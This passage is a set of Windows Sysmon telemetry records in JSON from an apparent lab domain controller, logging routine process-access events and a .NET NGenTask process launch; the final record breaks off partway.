{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6837,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.975\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.975","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6838,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.975\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.975","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6839,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.975\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.975","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6840,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.975\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.975","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6841,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.975\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.975","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6842,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.975\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.975","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6843,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.989\r\nProcessGuid: {E2A3D6B1-12B4-5F25-0000-0010BF860900}\r\nProcessId: 1172\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngentask.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Microsoft .NET Framework optimization service\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: NGenTask.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\" /RuntimeWide /StopEvent:308\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=310EC059A68DEB69CFC32CFA946FEFE0,SHA256=7BC95DCD791A505FDD9FD0E117EB0BD5AC4F28176E8127FFB39521DAEF670970,IMPHASH=00000000000000000000000000000000\r\nParentProcessGuid: {E2A3D6B1-12B4-5F25-0000-001072790900}\r\nParentProcessId: 4916\r\nParentImage: C:\\Windows\\System32\\taskhostw.exe\r\nParentCommandLine: taskhostw.exe /RuntimeWide","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.989","ProcessGuid":"{E2A3D6B1-12B4-5F25-0000-0010BF860900}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngentask.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Microsoft .NET Framework optimization service","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"NGenTask.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\" /RuntimeWide /StopEvent:308","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=310EC059A68DEB69CFC32CFA946FEFE0,SHA256=7BC95DCD791A505FDD9FD0E117EB0BD5AC4F28176E8127FFB39521DAEF670970,IMPHASH=00000000000000000000000000000000","ParentProcessGuid":"{E2A3D6B1-12B4-5F25-0000-001072790900}","ParentProcessId":"4916","ParentImage":"C:\\Windows\\System32\\taskhostw.exe","ParentCommandLine":"taskhostw.exe /RuntimeWide","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6844,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.991\r\nSourceProcessGUID: {E2A3D6B1-12B4-5F25-0000-001072790900}\r\nSourceProcessId: 4916\r\nSourceThreadId: 4500\r\nSourceImage: C:\\Windows\\system32\\taskhostw.exe\r\nTargetProcessGUID: {E2A3D6B1-12B4-5F25-0000-0010BF860900}\r\nTargetProcessId: 1172\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b56bc|UNKNOWN(00007FFF445411E2)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.991","SourceProcessGUID":"{E2A3D6B1-12B4-5F25-0000-001072790900}","SourceProcessId":"4916","SourceThreadId":"4500","SourceImage":"C:\\Windows\\system32\\taskhostw.exe","TargetProcessGUID":"{E2A3D6B1-12B4-5F25-0000-0010BF860900}","TargetProcessId":"1172","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b56bc|UNKNOWN(00007FFF445411E2)","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6845,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.991\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: 